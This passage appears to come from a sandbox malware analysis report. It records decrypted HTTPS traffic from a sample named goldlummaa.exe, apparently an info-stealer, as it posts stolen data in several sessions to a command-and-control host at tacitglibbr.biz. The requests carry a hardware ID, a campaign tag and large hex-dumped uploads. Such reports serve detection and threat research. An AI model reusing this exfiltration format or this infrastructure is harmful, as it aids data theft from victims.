                                                                                                                2024-12-18 13:17:49 UTC15009OUTData Raw: 2d 2d 4f 52 51 44 4b 39 48 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 37 44 42 36 46 32 32 31 34 33 41 46 44 32 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 4f 52 51 44 4b 39 48 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 52 51 44 4b 39 48 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 4f 52 51 44 4b 39 48 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
                                                                                                                Data Ascii: --ORQDK9H7Content-Disposition: form-data; name="hwid"277DB6F22143AFD2F9F1B7136A1E0C5E--ORQDK9H7Content-Disposition: form-data; name="pid"2--ORQDK9H7Content-Disposition: form-data; name="lid"LOGS11--LiveTraffic--ORQDK9H7Content-Di
                                                                                                                2024-12-18 13:17:52 UTC1045INHTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:17:52 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=spmlu003dk4v9g4v4fa1g78n30; expires=Sun, 13-Apr-2025 07:04:29 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pH4T7X1%2B%2F2dJw5fTW5y%2BtVYbCLbVKML6ZrniRO3Hd%2BAU6CmtdtZ787KeWDickFXEQG1iElgyakOmh0Z0Tyg0fGQNScm19z%2FSKRbk5hVCdxbyVnNCAa4aR9W3iBdQo4M1dS0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6f6e7a404291-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=24141&min_rtt=7678&rtt_var=13420&sent=11&recv=19&lost=0&retrans=0&sent_bytes=2839&recv_bytes=15938&delivery_rate=380307&cwnd=207&unsent_bytes=0&cid=a1bc459036a5f000&ts=3602&x=0"
                                                                                                                2024-12-18 13:17:52 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-18 13:17:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                4192.168.2.949756104.21.50.1614437460C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-18 13:17:54 UTC272OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=HQNCZSSBD
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 20531
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-18 13:17:54 UTC15331OUTData Raw: 2d 2d 48 51 4e 43 5a 53 53 42 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 37 44 42 36 46 32 32 31 34 33 41 46 44 32 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 48 51 4e 43 5a 53 53 42 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 51 4e 43 5a 53 53 42 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 51 4e 43 5a 53 53 42 44 0d 0a 43 6f 6e 74 65 6e
                                                                                                                Data Ascii: --HQNCZSSBDContent-Disposition: form-data; name="hwid"277DB6F22143AFD2F9F1B7136A1E0C5E--HQNCZSSBDContent-Disposition: form-data; name="pid"3--HQNCZSSBDContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--HQNCZSSBDConten
                                                                                                                2024-12-18 13:17:54 UTC5200OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 73 7d 51 30 b7 ee a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 ae 3f 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce f5 45 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 fe 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a d7 17 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 fa a3 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii: s}Q0u?4E([:s~X`nO
                                                                                                                2024-12-18 13:17:57 UTC1046INHTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:17:57 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=cr9km2kt8cv5h48un7palvabqs; expires=Sun, 13-Apr-2025 07:04:34 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rheeuW0eSUulWNOzB8xddxmddCAxCtAHCHDALk7a0SxcVipRG9wWess0tlOvR3y2mfkMMHJ4W1ED8IG48uMScMNdB2x%2FSKt86%2FsDY8a%2BAYd36%2B19iYRioixsgktwOsaj9%2F4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6f8f69eb42cd-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=24206&min_rtt=1606&rtt_var=14096&sent=12&recv=24&lost=0&retrans=0&sent_bytes=2839&recv_bytes=21483&delivery_rate=1818181&cwnd=242&unsent_bytes=0&cid=418722a9daf83cdf&ts=3086&x=0"
                                                                                                                2024-12-18 13:17:57 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-18 13:17:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                5192.168.2.949769104.21.50.1614437460C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-18 13:17:59 UTC281OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=2HTYL7EE2V9NXASFFZZ
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 1246
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-18 13:17:59 UTC1246OUTData Raw: 2d 2d 32 48 54 59 4c 37 45 45 32 56 39 4e 58 41 53 46 46 5a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 37 44 42 36 46 32 32 31 34 33 41 46 44 32 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 32 48 54 59 4c 37 45 45 32 56 39 4e 58 41 53 46 46 5a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 48 54 59 4c 37 45 45 32 56 39 4e 58 41 53 46 46 5a 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                Data Ascii: --2HTYL7EE2V9NXASFFZZContent-Disposition: form-data; name="hwid"277DB6F22143AFD2F9F1B7136A1E0C5E--2HTYL7EE2V9NXASFFZZContent-Disposition: form-data; name="pid"1--2HTYL7EE2V9NXASFFZZContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                2024-12-18 13:18:01 UTC1040INHTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:18:01 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=gehcic6l86jv4qlp75kditcgaq; expires=Sun, 13-Apr-2025 07:04:39 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2FfiPvU%2FnitPDAJhcL6XTb%2B08G7QZdMuhtb1XZjbaN1345qovPoKWgMy6jibqX2pYahwESqzYPR9M%2B10FkuMP1zfE1WWZOes8HXkT7FI96%2Bl1NFAEk8WpEs395i3jxhYtWI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8f3f6fae3a577c6f-EWR
                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1815&min_rtt=1810&rtt_var=690&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=2163&delivery_rate=1573275&cwnd=212&unsent_bytes=0&cid=fff4b0a76869e06a&ts=2261&x=0"
                                                                                                                2024-12-18 13:18:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                2024-12-18 13:18:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 0


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                6192.168.2.949780104.21.50.1614437460C:\Users\user\Desktop\goldlummaa.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-18 13:18:03 UTC283OUTPOST /api HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: multipart/form-data; boundary=L0F67C2UNUCPCVBJERP
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                Content-Length: 551737
                                                                                                                Host: tacitglibbr.biz
                                                                                                                2024-12-18 13:18:03 UTC15331OUTData Raw: 2d 2d 4c 30 46 36 37 43 32 55 4e 55 43 50 43 56 42 4a 45 52 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 37 37 44 42 36 46 32 32 31 34 33 41 46 44 32 46 39 46 31 42 37 31 33 36 41 31 45 30 43 35 45 0d 0a 2d 2d 4c 30 46 36 37 43 32 55 4e 55 43 50 43 56 42 4a 45 52 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 30 46 36 37 43 32 55 4e 55 43 50 43 56 42 4a 45 52 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                                                Data Ascii: --L0F67C2UNUCPCVBJERPContent-Disposition: form-data; name="hwid"277DB6F22143AFD2F9F1B7136A1E0C5E--L0F67C2UNUCPCVBJERPContent-Disposition: form-data; name="pid"1--L0F67C2UNUCPCVBJERPContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                                                2024-12-18 13:18:03 UTC15331OUTData Raw: ac 90 47 4c 0e f5 c9 3f e5 cc 47 f0 97 20 af 5e 1e 8e 4f 26 6c b7 cb 2b 8e dd 0e 8e b0 5d 8b f4 3f 12 ee c6 d4 ff 83 df da d9 59 11 65 10 82 ef 8e b1 c1 0d 71 17 9f 41 70 0d 54 2e 8b d7 6e 84 0b dc 80 39 7b e8 cb f9 8b ac 6b fd 63 10 22 f4 e7 3e 60 f7 7a 31 48 3b 78 36 f1 2e 0c a7 45 75 5a 06 7a 8d 93 53 2c e5 4d 61 14 44 7c 0c 1d 11 84 28 7f 22 4a 8b 31 b4 13 82 45 07 76 f4 ab 52 f3 9c da 1c 13 f9 86 e6 eb 83 f9 aa 6e e7 ad f0 83 da ad 63 76 3f c6 6a 8c ac 76 b1 6a 3b ef 4e 3a bc 1a 1e 94 b7 7b 9d c1 be 62 f7 a3 75 c6 b1 d4 d7 f1 f2 37 6b 14 63 b4 39 55 cb 16 74 5f 0b c6 b3 70 49 a9 e8 42 fe 45 ff ca 40 b2 3a 53 95 72 ef 25 0e 74 9f 92 a7 39 8d 74 e4 e8 a3 a8 48 e2 de 7d 5b 66 8f a6 26 1e 74 97 ea 81 9a cf 18 70 d6 fa 3c 22 e8 08 fd 05 e8 c2 2e 2d 9a 0a
                                                                                                                Data Ascii: GL?G ^O&l+]?YeqApT.n9{kc">`z1H;x6.EuZzS,MaD|("J1EvRncv?jvj;N:{bu7kc9Ut_pIBE@:Sr%t9tH}[f&tp<".-
                                                                                                                2024-12-18 13:18:03 UTC15331OUTData Raw: 9d f5 da d1 5c 56 7b b3 45 5b c8 54 25 bf e1 d0 7c 17 0f d8 8f 9f 1e 67 ca 12 41 0c 77 ac d3 ed 7b 8e 42 e5 ce 68 ba 02 c8 64 31 06 2a bd 00 b3 12 0d e0 b9 33 a0 d0 0c e4 fe 8e da 01 e3 25 d8 46 0a 75 23 28 14 95 43 7a f9 3f 38 f8 e9 3e 6e 2e 60 36 42 a0 5a a9 10 c9 03 ce 46 03 b8 ba 02 34 c9 20 11 fb 11 34 d5 1f d5 08 3b 55 f6 c0 5b 28 c6 ef 23 5c b3 9d 9a 79 a5 d0 31 32 2b a5 cc 56 14 55 22 32 17 80 c7 c8 9c 5b d3 be d0 4f c7 c0 5a bb e5 3c d6 76 01 cf 2e 09 7e 7c 6e 5b 01 44 c5 59 ed f9 8a f4 80 1f f2 dd 57 07 fe bc 7d 44 19 73 a6 1b 97 6d d6 96 b3 63 19 61 29 7e dc 85 60 47 df af 26 c6 89 98 a5 f0 9b 0c c3 0c 76 ce 1d 24 cf 2b 3e 45 03 26 79 bb 42 0f 0a 20 e9 7d 0a 6c a9 48 ca 26 b7 f8 74 f8 a2 a8 19 bc 52 f9 bb 6a 8e b3 33 bd b6 7f 4d 53 2a f0 33 0a
                                                                                                                Data Ascii: \V{E[T%|gAw{Bhd1*3%Fu#(Cz?8>n.`6BZF4 4;U[(#\y12+VU"2[OZ<v.~|n[DYW}Dsmca)~`G&v$+>E&yB }lH&tRj3MS*3
                                                                                                                2024-12-18 13:18:03 UTC15331OUTData Raw: 5e f4 05 e7 79 ba cd c0 b8 3c 1d e1 3b a2 59 23 fa 25 17 a5 68 c2 be 58 1f 2f d6 d6 e5 d0 c2 63 e1 e2 e0 ed 49 29 41 93 fb de de bb 49 72 91 ed 6c 07 79 a6 3d 3f 57 98 20 b2 31 6c 9e 92 bb 84 d1 1c 3b fe 2e bb 46 88 b5 e9 e9 b5 25 ff 59 a9 4e 67 b7 be ea 22 39 05 e1 bc 55 7e 98 eb 2a 3c 18 71 b0 7f f3 83 91 0e af f0 0a 76 fc 51 0d 6b bf d3 06 44 8e 1f 57 4d b2 ce 7a df 74 0b 40 5e ff 48 4e ed 45 29 e2 3b b4 68 fe d8 fb 1f a3 d5 b5 d5 7a 22 22 ac 8b e7 85 42 af 14 4b 20 f4 02 cd 70 66 0f bc d0 a7 ea ba 76 5d 8c 48 4c 11 22 b7 b6 6c 9d 4e cd be 1f e9 fe 19 97 11 ad e7 61 35 d7 f4 f3 fd 64 99 52 cc e9 f3 24 b7 25 f5 8d 2f 6e 9e 62 d6 2c 42 e3 9f 86 41 a4 39 f4 99 9d dd ed 9d 34 71 16 77 61 49 1a da ed f9 d4 37 39 b1 ea 81 ec b5 1a 5c 30 d1 98 ec cc 4c 90 97
                                                                                                                Data Ascii: ^y<;Y#%hX/cI)AIrly=?W 1l;.F%YNg"9U~*<qvQkDWMzt@^HNE);hz""BK pfv]HL"lNa5dR$%/nb,BA94qwaI79\0L
                                                                                                                2024-12-18 13:18:03 UTC15331OUTData Raw: e9 50 a2 2b ad 67 8f 7c bf 44 78 a8 b7 ba 78 b8 5d be a9 a3 93 a1 3f a3 b1 28 db 4d 3a 02 b2 ae 96 25 46 e4 22 3a c3 4e ae 5d 84 fd a5 07 d6 d6 3e 82 94 46 f8 fa 20 6c 88 f6 59 99 7f 6b 83 0e 70 ac 74 fa bd 3f 7b a5 06 40 a5 96 de ce b3 19 c7 5d fc f1 d7 21 26 09 be ab 8f 1a 01 a0 31 80 d5 ae 62 93 7d 47 46 7e 0a d8 0c 38 f8 84 5c 87 d2 37 9d a4 54 04 45 5b 1d 97 0e bf ea 51 b0 1c 49 7b 78 d7 7d 90 3e 36 49 4d 95 af 77 93 5e f8 01 d1 14 b1 a1 8f e6 47 67 80 cf 40 e7 1d 81 f6 ff 57 16 5b 93 fe f7 27 47 26 c8 27 71 45 c1 28 99 86 5d f5 18 4e a7 a7 00 9b 11 ec e9 1f 02 29 bc 20 2b d7 38 8a 71 0a 90 66 f3 7c 38 8d a6 67 62 a2 e1 8f b3 b1 67 c2 14 80 04 8a 71 4a c8 55 05 a9 9c 25 b7 8e 72 ec 8a 7a 10 19 2a 06 ce ba a5 63 61 b5 b0 1b 52 2b bf dd 50 d4 a8 60 31
                                                                                                                Data Ascii: P+g|Dxx]?(M:%F":N]>F lYkpt?{@]!&1b}GF~8\7TE[QI{x}>6IMw^Gg@W['G&'qE(]N) +8qf|8gbgqJU%rz*caR+P`1
                                                                                                                2024-12-18 13:18:03 UTC15331OUTData Raw: 63 2f 7c bf 06 92 bf c0 bb 25 41 f1 69 7f 15 1c e8 ff 38 dc c2 a9 48 28 93 eb 1e 68 6f da b8 9b b7 b1 94 b7 e9 77 e8 25 7a d6 25 c7 f8 83 95 3d d7 3a 20 a4 dc ea 01 a0 5b aa 9d 04 1d 2a 24 cf d3 35 b7 78 e1 e6 62 9e bc 86 f6 13 e9 23 fd d6 4d c5 a7 65 17 35 9b 4b d1 ef e2 37 1b 03 3a 55 55 17 d0 79 7d a9 ce 2e df 0e ee 66 15 dd 08 fd 99 1d a8 76 52 16 7a ba 9f aa fb 64 8b f9 76 b0 a7 ad 5e be f9 3f 7d aa c8 74 05 88 aa 84 03 66 7f c9 9b 59 4e 19 ce 10 2d 8f ea 33 ae 72 68 89 08 ce 93 13 e1 bc c3 83 28 38 4e 83 dd b5 07 87 42 78 c9 8f 4f 4a 17 8a 0f 9b 9c 7b df bf 1d 1c bc 6d f1 08 e7 bf f1 e0 41 f8 e2 20 88 7d 00 df 88 76 e1 c1 f8 1d ab b4 92 8f 33 65 3a b7 aa 80 93 24 09 95 79 32 50 4d f9 0e 91 4d d2 a2 b6 0e 22 3a 8b a8 40 8f 3e b2 14 e4 37 7f 13 34 73
                                                                                                                Data Ascii: c/|%Ai8H(how%z%=: [*$5xb#Me5K7:UUy}.fvRzdv^?}tfYN-3rh(8NBxOJ{mA }v3e:$y2PMM":@>74s
                                                                                                                2024-12-18 13:18:03 UTC15331OUTData Raw: 58 1e 15 cd d6 51 0d aa 42 d3 40 e8 d7 39 69 5f 89 8e cb eb bf 8b 5d f4 d9 9e e8 7c 35 ec 5c c1 2a 5f 87 a2 c8 c9 3a 17 a5 3f 1e dd e1 53 1f f6 9b e7 fc 55 28 41 11 ae 4c ea 9c 5c cc 68 d2 57 49 4c 4f 7c fb f9 2c ab 72 05 80 e3 9a 55 97 06 6c 20 42 6a 30 12 d9 e7 be 68 b9 6d ce f5 99 df c2 a3 60 9d 7e bf 82 04 50 b1 f6 ef 83 af 8c 1b 4d 69 3b 77 33 ae bd 8d 66 d0 39 10 67 aa ab e8 3b c4 94 6e ef 4b dc 6f 1c b0 60 3f 44 4e 1b f7 a5 1c 7d ec 52 aa 72 d9 b9 fc c0 93 b5 80 a9 96 47 0b de aa b3 79 52 a0 f8 aa ee c9 37 1d 41 8c 4f 9c dd 02 28 ed 8a 95 1b 9c 95 fc cc e6 be a0 fd 28 2a 3b e0 80 dd ac 20 a5 ec 7f 63 5a 0f 02 7b dc 06 61 c8 74 36 01 e4 f3 92 d4 b5 8e 0f b0 fb c2 4d 80 09 4c 01 54 51 57 9a 08 c1 19 ea f8 a0 d2 22 5a c6 cf d7 e3 44 e7 3f bd 25 90 5c
                                                                                                                Data Ascii: XQB@9i_]|5\*_:?SU(AL\hWILO|,rUl Bj0hm`~PMi;w3f9g;nKo`?DN}RrGyR7AO((*; cZ{at6MLTQW"ZD?%\
                                                                                                                2024-12-18 13:18:03 UTC15331OUTData Raw: b8 a5 07 cb 81 5f 3f a3 83 60 23 a6 71 4c 23 e2 0f d0 7f ef 62 e5 7b c3 2e df 36 c5 a7 17 b4 5d c2 8d b0 61 8e ed 9d 0c 55 ac 82 08 22 ca e3 56 1e fe 80 86 62 a9 c8 5a 8d a7 4e ff 3c 54 af e5 c7 16 5a 46 aa 58 ff 95 3d 98 1d 1d 8a ab 05 23 7e 2e cf ab 00 6c 68 37 07 34 4e b1 33 ee b9 88 56 ca 61 57 e4 6b dc e2 04 06 a5 7a c2 2e ed 92 ef 65 20 df 33 0f b5 41 e0 8a 55 be d7 f2 cb ea 26 b1 28 96 e4 31 04 e6 b1 cf f8 8d 74 16 3b 1b 16 7c 69 af 8d f4 3f 4d 4e 97 eb 09 2b 11 63 3a 87 e6 01 9b 0a d9 8a a4 e4 99 a4 c7 dd 99 36 4d b5 37 bc 5e d8 f1 9a e4 f8 92 34 05 d5 29 6a 40 01 33 34 93 de 48 e9 66 22 01 a2 5d e2 fb 29 92 fb 08 7a dc 93 ca 0b be 0f a3 8b d1 51 83 78 e0 56 72 02 ce eb fe 18 73 fe 9a 90 b3 9e 9e 32 fa da f9 5e 69 8d 07 9c 46 bd fa 58 6a 3e 46 1f
                                                                                                                Data Ascii: _?`#qL#b{.6]aU"VbZN<TZFX=#~.lh74N3VaWkz.e 3AU&(1t;|i?MN+c:6M7^4)j@34Hf"])zQxVrs2^iFXj>F
                                                                                                                2024-12-18 13:18:03 UTC15331OUTData Raw: 35 3f 4c 96 e4 1d a7 fa fb 04 8b 50 7d d7 0a 4e 1a 7c fc 7d 09 d1 1e 73 54 b6 88 9d c3 ec 8d 45 6f 1f 4f 5a 8c 50 65 7c cf 86 79 08 27 4e da ce 15 fa ea da bb a9 e5 c1 9b 2b ff d4 6b 89 82 2d 6e b8 34 4d dc cf c7 20 4d 2a e4 e0 5e 4c d1 06 d2 85 d4 2c 97 80 6c 5b c3 33 4e e1 5d 19 bf a0 aa 07 e8 3c 24 c8 1c 97 7b 4f cd 1b 35 10 c3 76 b8 1b 8d b7 58 c2 6f 0d 23 43 ce 5d a9 f2 aa c4 00 51 c6 4a 3f 69 f5 03 1d c9 ca d4 d1 b0 97 c9 55 c5 f3 06 04 08 e1 5e e6 4c 7d a2 ad 42 08 1c 12 cb df ce ad b9 81 09 9b dc 6f 71 d0 2c 46 2a 92 34 d6 f6 b7 4e 9f ae 41 32 9b d7 8b 13 a8 93 f1 32 45 c7 37 53 7e e3 b2 5f 92 e5 fe 5e c1 42 92 f3 a7 38 a9 61 54 14 35 e5 b5 52 42 13 ef f6 1c 6f 76 29 77 ff 60 05 26 14 04 8b b1 37 3d ab 2a 89 13 bf 67 bb f1 5a 76 f4 99 ba 6e 67 00
                                                                                                                Data Ascii: 5?LP}N|}sTEoOZPe|y'N+k-n4M M*^L,l[3N]<${O5vXo#C]QJ?iU^L}Boq,F*4NA22E7S~_^B8aT5RBov)w`&7=*gZvng
                                                                                                                2024-12-18 13:18:03 UTC15331OUTData Raw: b3 39 a7 56 2b 88 0d d7 b5 75 fb 74 bd d8 7a ed 9b 22 44 10 d5 ac 69 a4 4a 63 b7 c6 c8 ec 50 fd dc df 53 ac 5d fa 6b 93 76 89 9c 3b 3e 64 52 b6 ad 00 22 44 9d ef ef fe 6c 45 ce 14 eb 1f 15 05 93 21 df 97 e7 1c b2 e4 41 66 da d5 b2 f3 d0 a2 20 c0 ff ca b4 43 c0 16 59 e1 2a 48 7c 42 4c 3c 8a c0 dd 21 c2 7b 91 aa fc 49 bd ab e4 57 a7 25 23 1e 40 d4 13 3f 93 2a 8f 77 eb 61 c1 a4 73 d2 42 46 13 42 99 48 39 95 2c ae 91 9a 3a a6 4a ae 99 24 31 76 2a 27 da 04 82 63 a1 e8 d5 91 a5 40 b2 21 90 04 b5 85 34 f4 d2 44 41 6d b8 c5 5e 7b 55 e6 b9 1d ae 59 d5 65 54 d8 b8 71 d1 68 99 67 2e 66 1d c3 1f f2 72 f1 9d fd 79 92 36 35 de 4d 51 37 09 77 47 9c a5 ae e5 41 19 c2 08 7e c6 3d 6a 37 71 05 cc 22 1f c1 4a 54 8d 63 95 f0 92 08 36 ba bf 67 a6 78 ac 2f 52 02 9c 6c ed 7d 6a
                                                                                                                Data Ascii: 9V+utz"DiJcPS]kv;>dR"DlE!Af CY*H|BL<!{IW%#@?*wasBFBH9,:J$1v*'c@!4DAm^{UYeTqhg.fry65MQ7wGA~=j7q"JTc6gx/Rl}j
                                                                                                                2024-12-18 13:18:10 UTC1043INHTTP/1.1 200 OK
                                                                                                                Date: Wed, 18 Dec 2024 13:18:10 GMT
                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                Set-Cookie: PHPSESSID=mgge7u8ep63971l8fr3iiahnq6; expires=Sun, 13-Apr-2025 07:04:45 GMT; Max-Age=9999999; path=/
                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                vary: accept-encoding
